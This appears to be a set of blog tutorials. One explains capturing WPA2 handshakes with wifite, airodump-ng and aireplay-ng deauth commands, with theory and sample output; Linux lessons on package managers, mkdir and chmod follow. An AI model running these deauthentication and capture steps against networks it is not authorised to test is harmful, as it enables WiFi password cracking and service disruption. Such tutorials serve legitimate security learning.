Now the rest is going to be a piece of cake. Copy the exploit from desktop, and create the directories by using the easy peasy right click -> New folder method. After that just paste the file where it needs to be. You’ll be done. Now start msfconsole again or type reload_all to reload the module. This will add the module to metasploit and you can use it as you normally would.

Hack WiFi WPA-2 PSK Capturing the Handshake

WPA password hacking


Okay, so hacking WPA-2 PSK involves 2 main steps-

  1. Getting a handshake (it contains a hash derived from the password, not the password itself)
  2. Cracking the hash.

Now the first step is conceptually easy. What you need is you, the attacker, a client who’ll connect to the wireless network, and the wireless access point. When the client and access point communicate in order to authenticate the client, they perform a 4-way handshake that we can capture. This handshake contains a hash derived from the password. There’s no direct way of getting the password out of the hash, and that is what makes hashing a robust protection method. But there is one thing we can do. We can take all possible passwords that can exist, and convert them to hashes. Then we match the hash we created with the one that’s in the handshake. If the hashes match, we know what plain text password gave rise to the hash, and thus we know the password. If the process sounds really time consuming to you, it’s because it is. WPA hacking (and hash cracking in general) is a resource intensive and time-consuming process. There are various ways WPA cracking can be done. But since WPA is a long shot, we shall first look at the process of capturing a handshake. We will also see what problems one can face during the process (I’ll face the problems for you). Also, before that, some optional Wikipedia theory on what a 4-way handshake really is (you don’t want to become a script kiddie, do you?)

The Four-Way Handshake

The authentication process leaves two considerations: the access point (AP) still needs to authenticate itself to the client station (STA), and keys to encrypt the traffic need to be derived. The earlier EAP exchange or WPA2-PSK has provided the shared secret key PMK (Pairwise Master Key). This key is, however, designed to last the entire session and should be exposed as little as possible. Therefore the four-way handshake is used to establish another key called the PTK (Pairwise Transient Key). The PTK is generated by concatenating the following attributes: PMK, AP nonce (ANonce), STA nonce (SNonce), AP MAC address, and STA MAC address. The product is then put through PBKDF2-SHA1 as the cryptographic hash function.
The handshake also yields the GTK (Group Temporal Key), used to decrypt multicast and broadcast traffic. The actual messages exchanged during the handshake are depicted in the figure and explained below:

  1. The AP sends a nonce-value to the STA (ANonce). The client now has all the attributes to construct the PTK.
  2. The STA sends its own nonce-value (SNonce) to the AP together with a MIC, including authentication, which is really a Message Authentication and Integrity Code: (MAIC).
  3. The AP sends the GTK and a sequence number together with another MIC. This sequence number will be used in the next multicast or broadcast frame, so that the receiving STA can perform basic replay detection.
  4. The STA sends a confirmation to the AP.

All the above messages are sent as EAPOL-Key frames.
As soon as the PTK is obtained it is divided into five separate keys:
PTK (Pairwise Transient Key – 64 bytes)

  1. 16 bytes of EAPOL-Key Confirmation Key (KCK)– Used to compute MIC on WPA EAPOL Key message
  2. 16 bytes of EAPOL-Key Encryption Key (KEK) – AP uses this key to encrypt additional data sent (in the ‘Key Data’ field) to the client (for example, the RSN IE or the GTK)
  3. 16 bytes of Temporal Key (TK) – Used to encrypt/decrypt Unicast data packets
  4. 8 bytes of Michael MIC Authenticator Tx Key – Used to compute MIC on unicast data packets transmitted by the AP
  5. 8 bytes of Michael MIC Authenticator Rx Key – Used to compute MIC on unicast data packets transmitted by the station

The Michael MIC Authenticator Tx/Rx Keys provided in the handshake are only used if the network is using TKIP to encrypt the data.
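The derivation described above, as an added example written for this page (not code from the original post, from Wikipedia, or from any of the tools named here): PMK from the passphrase, PTK from the PMK plus both MAC addresses and nonces, the five-way split of the PTK, and the MIC that protects message 2. One correction to the quoted text: the standard derives the PMK with PBKDF2-SHA1, but the PTK with an HMAC-SHA1 based PRF. All passphrase, SSID, MAC and nonce values are constructed.

```python
import hashlib
import hmac

# Offset of the 16-byte MIC field inside an EAPOL-Key frame:
# 4-byte 802.1X header + descriptor type(1) + key info(2) + key length(2)
# + replay counter(8) + nonce(32) + IV(16) + RSC(8) + ID(8) = 81
MIC_OFFSET = 81


def derive_pmk(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes).

    These 4096 iterations are the only fixed cost per passphrase guess, so the
    strength of a WPA2-PSK network rests on the passphrase's entropy.
    """
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf_512(key: bytes, label: bytes, data: bytes) -> bytes:
    """802.11i PRF-512: HMAC-SHA1(key, label || 0x00 || data || i) for i = 0..3,
    concatenated and truncated to 64 bytes. (Unlike the PMK, the PTK is derived
    with this HMAC-based PRF, not with PBKDF2.)"""
    out = b"".join(
        hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
        for i in range(4)
    )
    return out[:64]


def derive_ptk(pmk: bytes, ap_mac: bytes, sta_mac: bytes, anonce: bytes, snonce: bytes) -> dict:
    """Split the 64-byte PTK into the five keys listed above (the two Michael
    keys are only meaningful for TKIP; CCMP uses the first 48 bytes)."""
    data = (min(ap_mac, sta_mac) + max(ap_mac, sta_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    ptk = prf_512(pmk, b"Pairwise key expansion", data)
    return {"KCK": ptk[0:16], "KEK": ptk[16:32], "TK": ptk[32:48],
            "MIC_TX": ptk[48:56], "MIC_RX": ptk[56:64]}


def build_eapol_key_frame(key_info: int, replay_counter: int, nonce: bytes,
                          key_data: bytes = b"") -> bytes:
    """Construct an EAPOL-Key frame (RSN descriptor) with the MIC field zeroed."""
    body = (bytes([2])                         # descriptor type 2 = RSN
            + key_info.to_bytes(2, "big")
            + (16).to_bytes(2, "big")          # key length: 16 for CCMP
            + replay_counter.to_bytes(8, "big")
            + nonce                            # 32-byte ANonce or SNonce
            + bytes(16) + bytes(8) + bytes(8)  # key IV, key RSC, key ID
            + bytes(16)                        # MIC placeholder
            + len(key_data).to_bytes(2, "big") + key_data)
    # 802.1X header: protocol version 2, packet type 3 (EAPOL-Key), body length
    return bytes([2, 3]) + len(body).to_bytes(2, "big") + body


def compute_mic(kck: bytes, frame: bytes) -> bytes:
    """WPA2 (key descriptor version 2): HMAC-SHA1 over the frame with the MIC
    field zeroed, truncated to 16 bytes."""
    zeroed = frame[:MIC_OFFSET] + bytes(16) + frame[MIC_OFFSET + 16:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def sign_frame(kck: bytes, frame: bytes) -> bytes:
    return frame[:MIC_OFFSET] + compute_mic(kck, frame) + frame[MIC_OFFSET + 16:]


def verify_frame(kck: bytes, frame: bytes) -> bool:
    received = frame[MIC_OFFSET:MIC_OFFSET + 16]
    return hmac.compare_digest(compute_mic(kck, frame), received)


def demo_handshake(passphrase: str = "correct horse battery staple", ssid: str = "me"):
    """Run message 2 of the handshake on both sides. Returns (AP accepts the
    STA's MIC, a different passphrase reproduces the MIC)."""
    ap_mac = bytes.fromhex("020000000001")    # constructed locally-administered MACs
    sta_mac = bytes.fromhex("020000000002")
    anonce = hashlib.sha256(b"constructed ANonce").digest()  # 32 bytes each
    snonce = hashlib.sha256(b"constructed SNonce").digest()
    # STA: PMK from the passphrase, PTK from both nonces, MIC over message 2
    sta_kck = derive_ptk(derive_pmk(passphrase, ssid), ap_mac, sta_mac, anonce, snonce)["KCK"]
    msg2 = sign_frame(sta_kck, build_eapol_key_frame(0x010A, 1, snonce))
    # AP: derives the same PTK from its own copy of the PMK and checks the MIC
    ap_kck = derive_ptk(derive_pmk(passphrase, ssid), ap_mac, sta_mac, anonce, snonce)["KCK"]
    accepted = verify_frame(ap_kck, msg2)
    # Everything in msg2 except the PMK travels in the clear, so a captured
    # handshake lets a PMK candidate be checked offline against this MIC;
    # only the right passphrase reproduces it.
    other_kck = derive_ptk(derive_pmk("wrong passphrase", ssid), ap_mac, sta_mac, anonce, snonce)["KCK"]
    return accepted, verify_frame(other_kck, msg2)


if __name__ == "__main__":
    print(demo_handshake())  # (True, False)
```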


By the way, if you didn’t understand much of it then don’t worry. There’s a reason why people don’t search for hacking tutorials on Wikipedia (half the stuff goes above the head)

Capturing The Handshake

Now there are several (only 2 listed here) ways of capturing the handshake. We’ll look at them one by one-

  1. Wifite (easy and automatic)
  2. Airodump-ng (easy but not automatic, you manually have to do what wifite did on its own)

Wifite

Methodology

We’ll go with the easy one first. Now you need to realize that for a handshake to be captured, there needs to be a handshake. There are 2 options: you could either sit there and wait till a new client shows up and connects to the WPA network, or you can force the already connected clients to disconnect, and when they connect back, you capture their handshake. Now while other tutorials don’t mention this, I will (such a good guy I am 🙂 ). Your network card is good at receiving packets, but not as good at creating them. If your clients are very far from you, your deauth requests (i.e. please get off this connection requests) won’t reach them, and you’ll keep wondering why you aren’t getting any handshake (the same kind of problem is faced during ARP injection and other kinds of attacks too). So, the idea is to be as close to the access point (router) and the clients as possible. The methodology is the same for the wifite and airodump-ng methods, but wifite does all this crap for you, and in the case of airodump-ng, you’ll have to call a brethren (aireplay-ng) to your rescue. Okay, enough theory.

Get the handshake with wifite

Now my configuration here is quite simple. I have my cellphone creating a wireless network named ‘me’ protected with WPA-2. Currently no one is connected to the network. Let’s try and see what wifite can do.

root@kali:~# wifite
  .;'                     `;,
 .;'  ,;'             `;,  `;,   WiFite v2 (r85)
.;'  ,;'  ,;'     `;,  `;,  `;,
::   ::   :   ( )   :   ::   ::  automated wireless auditor
':.  ':.  ':. /_\ ,:'  ,:'  ,:'
 ':.  ':.    /___\    ,:'  ,:'   designed for Linux
  ':.       /_____\      ,:'
            /       \

[+] scanning for wireless devices…
[+] enabling monitor mode on wlan0… done
[+] initializing scan (mon0), updates at 5 sec intervals, CTRL+C when ready.
[0:00:04] scanning wireless networks. 0 targets and 0 clients found

[+] scanning (mon0), updates at 5 sec intervals, CTRL+C when ready.
   NUM ESSID                 CH  ENCR  POWER  WPS?  CLIENT
   --- --------------------  --  ----  -----  ----  ------
    1  me                     1  WPA2  57db   wps
    2  *******               11  WEP   21db    no   client
    3  **************        11  WEP   21db    no


Now as you can see, my network showed up as ‘me’. I pressed ctrl+c and wifite asked me which target to attack (the network has wps enabled. This is an added bonus, reaver can save you from all the trouble. Also, wifite will use reaver too to skip the whole WPA cracking process and use a WPS flaw instead. We have a tutorial on hacking WPA WPS using Reaver already, in this tutorial we’ll forget that this network has WPS and capture the handshake instead)
[+] select target numbers (1-3) separated by commas, or ‘all’: 
Now I selected the first target, i.e. me. As expected, it had two attacks in store for us. First it tried the PIN guessing attack. It has an almost 100% success rate, and would have given us the password had I waited for 2-3 hours. But I pressed ctrl+c and it tried to capture the handshake. I waited for 10-20 secs, and then pressed ctrl+c. No client was there so no handshake could be captured. Here’s what happened.

[+] 1 target selected.
[0:00:00] initializing WPS PIN attack on me (02:73:8D:37:A7:ED)
^C0:00:24] WPS attack, 0/0 success/ttl,
(^C) WPS brute-force attack interrupted
[0:08:20] starting wpa handshake capture on “me”
[0:08:05] listening for handshake…
(^C) WPA handshake capture interrupted
[+] 2 attacks completed:
[+] 0/2 WPA attacks succeeded
[+] disabling monitor mode on mon0… done
[+] quitting


Now I connected my other PC to ‘me’. Let’s do it again. This time a client will show up, wifite will de-authenticate it, and it’ll try to connect again. Let’s see what happens this time around.


   NUM ESSID                 CH  ENCR  POWER  WPS?  CLIENT
   --- --------------------  --  ----  -----  ----  ------
    1  *                      1  WPA   99db    no   client
    2  me                     1  WPA2  47db   wps   client
    3  *                     11  WEP   22db    no   clients
    4  *                     11  WEP   20db    no

[+] select target numbers (1-4) separated by commas, or ‘all’: 2
[+] 1 target selected.
[0:00:00] initializing WPS PIN attack on me (02:73:8D:37:A7:ED)
^C0:00:07] WPS attack, 0/0 success/ttl,
(^C) WPS brute-force attack interrupted
[0:08:20] starting wpa handshake capture on “me”
[0:07:51] listening for handshake…
(^C) WPA handshake capture interrupted
[+] 2 attacks completed:
[+] 0/2 WPA attacks succeeded
[+] quitting



Now the deauth attacks weren’t working. This time I increased the deauth frequency.
root@kali:~# wifite -wpadt 1
Soon, however, I realized that the problem was that I was using my internal card (Kali Live USB). It does not support packet injection, so deauth wasn’t working. So, time to bring my external card onto the scene.

root@kali:~# wifite
  .;'                     `;,
 .;'  ,;'             `;,  `;,   WiFite v2 (r85)
.;'  ,;'  ,;'     `;,  `;,  `;,
::   ::   :   ( )   :   ::   ::  automated wireless auditor
':.  ':.  ':. /_\ ,:'  ,:'  ,:'
 ':.  ':.    /___\    ,:'  ,:'   designed for Linux
  ':.       /_____\      ,:'
            /       \

[+] scanning for wireless devices…
[+] available wireless devices:
1. wlan1        Ralink RT2870/3070    rt2800usb - [phy1]
2. wlan0        Atheros               ath9k - [phy0]
[+] select number of device to put into monitor mode (1-2):



See, we can use the USB card now. This will solve the problems for us.
Now look at wifite output

   NUM ESSID                 CH  ENCR  POWER  WPS?  CLIENT
   --- --------------------  --  ----  -----  ----  ------
    1  me                     1  WPA2  44db   wps   client
    2  *                     11  WEP   16db    no   client
    3  *                     11  WEP   16db    no

[+] select target numbers (1-3) separated by commas, or ‘all’:
Now I attack the target. This time, finally, I captured a handshake.
[+] 1 target selected.
[0:00:00] initializing WPS PIN attack on me (02:73:8D:37:A7:ED)
^C0:00:01] WPS attack, 0/0 success/ttl,
(^C) WPS brute-force attack interrupted
[0:08:20] starting wpa handshake capture on “me”
[0:07:23] listening for handshake…
[0:00:57] handshake captured! saved as “hs/me_02-73-8D-**-**-**.cap”
[+] 2 attacks completed:
[+] 1/2 WPA attacks succeeded
me (02:73:8D:37:A7:ED) handshake captured
saved as hs/me_02-73-8D-**-**-**.cap

[+] starting WPA cracker on 1 handshake
[!] no WPA dictionary found! use -dict <file> command-line argument
[+] disabling monitor mode on mon0… done
[+] quitting

As you can see, it took 57 seconds to capture the handshake (5 deauth requests were sent; one every 10 secs is the default). The no-dictionary error shouldn’t bother you. We’ll use Wifite only to capture the handshake. The captured handshake was saved as a .cap file which can be cracked using aircrack, pyrit, hashcat (after converting to .hccap), etc. using either a wordlist or bruteforce. Let’s see how to do the same thing with airodump-ng. This time I won’t show you the problems you might run into. It’ll be a perfect ride; all the problems were seen in the wifite case.



Capturing Handshake with Airodump-ng

Now if you skipped everything and got right here, then you are missing a lot of things. I’ll end this pretty quick, as the wifite part was quite detailed. I’m copying stuff from http://www.kalitutorials.net/2013/08/wifi-hacking-wep.html where I already discussed airodump-ng. (If you are not a newbie, skip to the part marked ‘Non newbies’ below.)

1. Find out the name of your wireless adapter.


Alright, now, your computer has many network adapters, so to scan one, you need to know its name. So there are basically the following things that you need to know-
  • lo – loopback. Not important currently.
  • eth – ethernet
  • wlan – This is what we want. Note the suffix associated.
Now, to see all the adapters, type ifconfig on a terminal. See the result. Note down the wlan(0/1/2) adapter.

If the wlan interface does not show up, it is because virtual machines can’t use internal wireless cards and you will have to use an external card. You should try booting Kali from a Live USB (just look at the first part of this tutorial), or buy an external card.

2. Enable Monitor mode

Now, we use a tool called airmon-ng to create a virtual interface called mon. Just type

airmon-ng start wlan0

 Your mon0 interface will be created.



3. Start capturing packets

Now, we’ll use airodump-ng to capture the packets in the air. This tool gathers data from the wireless packets in the air. You’ll see the name of the wifi you want to hack.

airodump-ng mon0


4. Store the captured packets in a file

This can be achieved by giving some more parameters with the airodump command

airodump-ng mon0 --write name_of_file

Non newbies-
root@kali:~# airmon-ng start wlan1
root@kali:~# airodump-ng mon0 -w anynamehere

Now copy the bssid field of your target network (from the airodump-ng screen) and launch a deauth attack with aireplay-ng

root@kali:~# aireplay-ng --deauth 0 -a BSSID here mon0

The --deauth option tells aireplay to launch a deauth attack. 0 tells it to fire at an interval of 0 secs (very fast, so run it only for a few secs and press ctrl+c). -a requires the BSSID; replace ‘BSSID here’ with your target BSSID. mon0 is the interface you created.
In case you face problems with the monitor mode hopping from one channel to another, or problems with beacon frames, then fix mon0 on a channel using:
root@kali:~# airodump-ng mon0 -w anynamehere -c 1
Replace 1 with the channel where your target AP is. You might also need to add --ignore-negative-one if aireplay demands it. In my case airodump-ng said fixed channel mon0: -1 so this was required. (It’s a bug in the aircrack-ng suite.)

Now when you look at the airodump-ng screen, you’ll see that at the top right it says WPA handshake followed by the BSSID. Here is what it looks like

 CH  1 ][ Elapsed: 24 s ][ 2014-06-13 22:41 ][ WPA handshake: **

 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

 02:73:8D:37:A7:ED  -47  75      201       35    0   1  54e  WPA2 CCMP   PSK  me

 BSSID              STATION            PWR   Rate    Lost    Frames  Probe

 *                  *                    0    0e- 1    742       82  me
 *                  *                  -35    0e- 1      0       26


You can confirm it by typing the following

root@kali:~# aircrack-ng anynamehere-01.cap
Opening anynamehere-01.cap
Read 212 packets.
#  BSSID              ESSID                     Encryption
1  **************  me                        WPA (1 handshake)
2  **                          Unknown




Installing new software on Linux (Debian, Red Hat, Slackware)


Debian:
There are various methods of installing new programs on a Debian system. I like to classify them according to your connection type.

Code:
dpkg

This is the “classic” way of updating a Debian system. Typically, you could go to Debian’s website or any one of its mirrors and download a package.

Code:
dpkg -i package.deb

to install it.

The main drawback to this is that you may find a package that you like but it may have dependencies (ie. other programs that it needs to make it run) and if you don’t have those packages, then the install will fail.

This is what the Debian people themselves have to say about this method:

Many people find this approach much too time-consuming, since Debian evolves so quickly — typically, a dozen or more new packages are uploaded every week. This number is larger just before a new major release. To deal with this avalanche, many people prefer to use automated programs.

Despite what they say, the main advantage of dpkg, it seems to me, is that it is easy for people who have dial-up connections. This is because the alternative, the automated programs they’re talking about (dselect and apt-get), are better suited to permanent connections (cable, xDSL, T1, T3). Let’s talk about this method of installing new programs with Debian.

Code:
dselect

When you use dselect you get a graphic user interface of sorts (not under X window, though) to guide you through the install of new programs.

First you’ll get asked for your preferred access method. That means how you’re going to get and install them. For example, if I were doing an install of Debian with CDs, then I would choose CD-ROM. But if I were updating, I would choose FTP.

Then you would choose the packages you want with a + sign. You can even put updates on hold (indicate that you want to update, but not actually do it) with a = sign. There may even be conflicts or dependency problems and ‘dselect’ will warn you about those.

Then you start the process by choosing the install option.

Debian will then configure the installed packages.

Then you’re on your way.

As I said before, the main advantage to this is that any conflicts or dependency problems will be resolved right here. The Debian people point out that this is ideal for installs or large-scale upgrades. If that’s the case, it seems that a slow and sometimes expensive dial-up connection would be less than ideal for this.

Red Hat:
The way you install a new program will depend primarily on two things:

1) What distribution (version) of Linux are you using?
2) What is the origin of the program that you want to install?

RPM

If you’re using Red Hat or a distribution that bases itself on Red Hat, then you’re going to use the RPM method. OK racing fans: RPM doesn’t have anything to do with revolutions per minute. It stands for Red Hat Package Manager. This system takes the heartache out of installing programs under Linux, for the most part. You can go to the Red Hat website or any number of mirrors and get programs for Linux. Developers will almost always offer their programs in RPM format due to its popularity. I also want to note that RPM has also come to mean the package itself (as in “I downloaded an RPM yesterday”).

There are some basic commands you’re going to need to know to take advantage of the RPM system.

Code:
rpm -i new_program.rpm

This installs the program (-i option for install)

Code:
rpm -q program_name

This “queries” your system to see if you’ve got a certain program installed. Let’s say you hear there’s a new version of the popular Internet browser Opera for Linux and you don’t know if your Red Hat based distribution installs this by default or not. Before you download the RPM for Opera, you could type the command:

Code:
rpm -q opera

If you do have the package installed, it would give you the version number:

opera-11.62

If you don’t have the package installed, you will see:

package opera is not installed

If you don’t have Opera installed, then you can download their RPM and run rpm -i opera_whatever_version.rpm as root and install the program.

If you do have the program installed and the rpm -q opera command gives you an older version number and you want the newer one, then you have two options.

One is to “uninstall” the older package and install a new one in its place. Not that this is the most efficient option. I just wanted to introduce you to the -e option for RPM. That is, to get rid of a program that you’ve installed, you would type rpm -e program_name. For example, if you’ve got Opera’s beta version 7 and you’ve just downloaded the beta version 8, then you would first do:

Code:
rpm -e opera

This gets rid of Opera from your system. Then you would type rpm -i opera_beta8.rpm (or whatever the package is actually called). That installs the new version.

As I said, this is not the most efficient way to update packages. The usual way is to use the -U (as in Update) option.

You would type:

Code:
rpm -U opera_new_version.rpm

and that would install the new version and remove the old version from your system.

Those are the basic commands of the RPM install/update system in a nutshell.

When you’re using your window manager, there are some very good graphically based tools for installing, updating and uninstalling RPMs. You can choose menu options to do all that we explained before instead of having to type the commands in the terminal. You may want to look into programs like Kpackage for KDE or Gnome RPM for the GNOME environment. They may make these tasks a lot easier, especially if you’re just starting out in the Linux world.

Some words of caution on downloading RPMs

Some of the most popular Linux distributions base their install and update procedures on Red Hat’s package management system. These include Mandrake and SuSE, for example. Both of these companies create their own RPMs to be specifically installed on their systems. That means if you’re using SuSE or Mandrake your best bet is to go to their respective “official” websites or mirrors and download their particular RPM and install it using the procedure outlined above or their specific tools. You may run into a problem if you install an RPM for Red Hat on a SuSE system. Certain components in the package (like documentation or libraries) may get copied into a different directory than was intended for that system. Third party RPMs from reputable companies, like the Opera web browser mentioned above, should install fine on any RPM based system. I have successfully installed this package (the same exact RPM file) on SuSE, Mandrake and Red Hat. I even converted this RPM to Debian (.deb) package format and successfully installed it on a computer running Debian. More on this conversion later in the show!

Just a brief second word of caution. Getting an RPM doesn’t necessarily mean that you’re automatically (or “auto-magically”) going to be able to install it. Many websites out there offer RPMs for download. The good ones usually include, on that particular RPM’s page, a list of other programs or libraries that you need in order to successfully install and use the program. If you see a list a mile long of “requirements” (those other programs and libraries you need), then you might want to ask yourself if you really want to try that program out.

And here’s just an editorial comment on my part about this type of thing as well. The big buzz word with Linux is “free”. That’s fine. You can theoretically get a distribution from the Internet along with programs and install it for free (i.e. no money down). I think, however, that time is money, to use the trite expression. Time might be even more valuable than money (lost money might be re-earned, but not lost time). When I first installed Linux oh so many years ago, updating and installing stuff was at times a frustrating experience. I suggest that newcomers to the Linux world buy (yes, I said buy) a good boxed set of a commercial distribution and then they’ll have more programs than they would ever need, all installed and working properly, along with a manual to tell you what to do in case something doesn’t work.

Code:
yum

Yum is a package manager that was developed by Duke University to improve the installation of RPMs. Yum searches numerous repositories for packages and their dependencies so they may be installed together, in an effort to alleviate dependency issues. Red Hat Enterprise Linux 5 uses Yum to fetch packages and install RPMs, as do many Red Hat derivatives like CentOS and Fedora Core.

Yum uses a configuration file at /etc/yum.conf.

There are multiple ways by which you can install a repository on the system and install/update packages:

Code:
yum search package_name
yum info package_name
yum install package_name
yum update package_name
yum remove package_name

Slackware:

Slackware, known to the Linux world as “Slack”, has the reputation of being, on one hand, a flexible distribution that allows you to do practically anything you want and, on the other hand, one that is for “experienced” Linux users only.

A lot of these considerations are “politically” motivated. Slackware lacks some of the “smooth” and “slick” graphic installation packages that are becoming standard fare in commercial companies’ offerings but in the end, if you’re willing to just use the command line utilities, it’s just as easily updated as any other major distribution.

Slackware’s package format

Slackware packages come in *.tgz format. This is a variation of the *.tar.gz format we’ve seen before. You can go to your favorite website and download new programs for your Slackware system and with a simple:

Code:
installpkg some_program.tgz

you have your new program installed.

If that particular package doesn’t quite move you and inspire you too much, you can just remove it:

Code:
removepkg some_program.tgz

You can also add the option -warn after the installpkg/removepkg command and, instead of installing the package, it will tell you what new files are going to get added to your hard disk. That’s a good option for the “I wonder if I want this” moments of your life.

Upgrading packages

You can upgrade programs to newer versions with this command:

Code:
upgradepkg a_new_version_of_something.tgz

Using other package formats

If you’re using Slackware and you can’t find the package you’re looking for in *.tgz format, you can also grab an *.rpm and convert it.

The way to do this is:


Code:
rpm2tgz some_package.rpm

This takes the rpm in question and converts it to *.tgz format. Then you can use installpkg on the new file you’ve created to install it.

GUI does not necessarily = GOOD

Once again, there is a common misconception that just because something doesn’t have a wonderful graphic interface that makes you say “oooh” and “ahhhh”, it is somehow inferior. Don’t let that missing GUI fool you here. A computer running Slackware is a tremendously flexible and configurable system. So what if you have to write things on a command line? That’s what you’ve got a keyboard for, isn’t it?

Enjoy your Slack system!

Linux mkdir and rmdir commands

‘mkdir’ is the command for making directories. ‘mkdir’ may be familiar to MS-DOS users out there. As you have noticed, the people who wrote these programs tried to give them names that described what they do more or less, not as long as ‘makemeadirectoryplease’ and not too cryptic like ‘xr77b’.

Using the ‘mkdir’ command

To create the directory ‘my_friends’ that we talked about in the last lesson, you would type:

Code:
mkdir my_friends

There are no whistles or buzzers. If you’d like some sort of acknowledgment, you could type

Code:
mkdir --verbose my_friends

and it will tell you that you created the directory.

If you type ls -l you’ll see it there along with information about it.


Now you know how to use ‘mkdir’. You can even use it to create a directory called ‘my_enemies’ if you’re into that sort of thing.

The ‘rmdir’ command

‘rmdir’ is the opposite of ‘mkdir’- it gets rid of directories. It should be pointed out that in order to use it, the directory has to be empty. If you copied or moved anything to ‘my_friends’ and you typed

Code:
rmdir my_friends/

Linux would politely tell you that you can’t do that.

So, you have to use your ‘rm’ command on the files first to remove them, or use ‘mv’ to get them into another directory. Then you’re free to use ‘rmdir’.

Linux File Permissions – chmod

Linux has inherited the concept of file ownership and permissions from UNIX.

As we mentioned at the beginning of this course, the big advantage that Linux has is its multi-user concept- the fact that many different people can use the same computer or that one person can use the same computer to do different jobs. That’s where the system of file permissions comes in to help out in what could be a very confusing situation. We’re going to explain some basic concepts about who owns the file and who can do what with a file. We won’t get into an enormous amount of detail here. We’ll save that for the Linux system administration course. We will show you how to understand file permission symbols and how to modify certain files so that they’re more secure.

File permission symbols

If you run the command

Code:
ls -l

in your home directory, you will get a list of files that may include something like this

Code:
-rw-r--r--  1  bob  users  1892  Jul 10  18:30 linux_course_notes.txt

This basically says, interpreting this from RIGHT to LEFT that the file, linux_course_notes.txt was created at 6:30 PM on July 10 and is 1892 bytes large. It belongs to the group users (i.e, the people who use this computer). It belongs to bob in particular and it is one (1) file. Then come the file permission symbols.

Let’s look at what these symbols mean:

The dashes – separate the permissions into three types

The first part refers to the owner’s (bob’s) permissions.

The dash – before the rw means that this is a normal file that contains any type of data. A directory, for example, would have a d instead of a dash.

The rw that follows means that bob can read and write to (modify) his own file. That’s pretty logical. If you own it, you can do what you want with it.

The second part of these symbols, after the second dash, are the permissions for the group. Linux can establish different types of groups for file access. In a one-home-computer environment anyone who uses the computer can read this file but cannot write to (modify) it. This is a completely normal situation. You, as a user, may want to take away the rights of others to read your file. We’ll cover how to do that later.

After the two dashes (two here because there are no write or execute permissions for the group) come the overall user permissions. Anyone who might have access to the computer from inside or outside (in the case of a network) can read this file. Once again, we can take away the possibility of people reading this file if we so choose.

Let’s take a look at some other examples. An interesting place to look at different kinds of file permissions is the /bin directory. Here we have the commands that anybody can use on the Linux system. Let’s look at the command for gzip, a file compression utility for Linux.

Code:
-rwxr-xr-x  1 root    root        53468 May  1  1999 gzip

As we see here, there are some differences.

The program name, date, bytes are all standard. Even though this is obviously different information, the idea is the same as before.

The changes are in the owner and group. Root owns the file and it is in the group “root”. Root is actually the only member of that group.

The file is an executable (program) so that’s why the letter x is among the symbols.

This file can be executed by everybody: the owner (root), the group (root) and all others that have access to the computer

As we mentioned, the file is a program, so there is no need for anybody other than root to “write” to the file, so there is no w permission on it for anybody but root.

If we look at a file in /sbin, where the files are ones that only root can use or execute, the permissions would look like this:

Code:
-rwxr--r--  1 root    root        1065 Jan 14  1999 cron

‘cron’ is a program on Linux systems that allows programs to be run automatically at certain times and under certain conditions. As we can see here, only root, the owner of the file, is allowed to use this program. There are no x permissions for the rest of the users.

We hope you enjoyed this little walk-through of file permissions in Linux. Now that we know what we’re looking for, we can talk about changing certain permissions.

chmod

chmod is a Linux command that will let you “set permissions” (aka, assign who can read/write/execute) on a file.

Code:
chmod permissions file
Code:
chmod permission1_permission2_permission3 file

When using chmod, you need to be aware that there are three types of Linux users that you are setting permissions for. Therefore, when setting permissions, you are assigning them for “yourself”, “your group” and “everyone else” in the world. These users are technically known as:

Owner
Group
World

Therefore, when setting permissions on a file, you will want to assign all three levels of permissions, and not just one user.

Think of the chmod command actually having the following syntax…

chmod owner group world FileName

Now that you understand that you are setting permissions for THREE user levels, you just have to wrap your head around what permissions you are able to set!

There are three types of permissions that Linux allows for each file.

read
write
execute

Putting it all together:

So, in layman’s terms, if you wanted a file to be readable by everyone, and writable by only you, you would write the chmod command with the following structure.

COMMAND : OWNER : GROUP : WORLD : PATH

chmod read & write read read FileName

Code:
chmod 644 myDoc.txt

Wait! What are those numbers?!?

Computers like numbers, not words. Sorry. You will have to deal with it. Take a look at the following output of ls -l

Code:
-rw-r--r-- 1 gcawood iqnection 382 Dec 19 6:49 myDoc.txt

You will need to convert the word read or write or execute into the numeric equivalent (octal) based on the table below.

4 read (r)
2 write (w)
1 execute (x)

Practical Examples

chmod 400 mydoc.txt read by owner
chmod 040 mydoc.txt read by group
chmod 004 mydoc.txt read by anybody (other)
chmod 200 mydoc.txt write by owner
chmod 020 mydoc.txt write by group
chmod 002 mydoc.txt write by anybody
chmod 100 mydoc.txt execute by owner
chmod 010 mydoc.txt execute by group
chmod 001 mydoc.txt execute by anybody

Wait! I don’t get it… there aren’t enough permissions to do what I want!

Good call. You need to add up the numbers to get other types of permissions…

So, try wrapping your head around this!!

7 = 4+2+1 (read/write/execute)
6 = 4+2 (read/write)
5 = 4+1 (read/execute)
4 = 4 (read)
3 = 2+1 (write/execute)
2 = 2 (write)
1 = 1 (execute)

chmod 666 mydoc.txt read/write by anybody! (the devil loves this one!)
chmod 755 mydoc.txt rwx for owner, rx for group and rx for the world
chmod 777 mydoc.txt read, write, execute for all! (may not be the best plan in the world…)
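To tie the two halves of this section together (reading the permission string that ls -l prints, and turning it into the number chmod wants), here is an added shell example; it is not code from the original post. It goes slightly beyond the text: an s or t in the execute slot (the setuid/setgid/sticky bits) is counted as execute, and the “+” or “.” that some ls versions append after the ten-character mode is ignored. The function names (triplet_to_digit, mode_to_octal, world_writable, find_world_writable, demo) and the scratch files it creates are this example’s own.

```shell
#!/bin/sh
# Added example, not part of the original post: decode the permission string
# that ls -l prints, turn it into the octal number chmod expects (4/2/1 per
# triplet, as in the table above), and flag world-writable files.
# Function names are this example's own, not a standard tool.

# One triplet such as "rwx" or "r--" -> one octal digit (r=4, w=2, x=1).
# s/t in the execute slot (setuid/setgid/sticky with execute set) still
# count as execute; uppercase S/T would mean the special bit without execute.
triplet_to_digit() {
    n=0
    case "$1" in r??) n=$((n + 4)) ;; esac
    case "$1" in ?w?) n=$((n + 2)) ;; esac
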